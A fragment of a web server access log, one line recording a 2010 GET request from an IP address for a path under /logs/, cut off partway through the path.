125.247.160.130 - - [19/Mar/2010:05:02:12 -0400] "GET /logs/access_l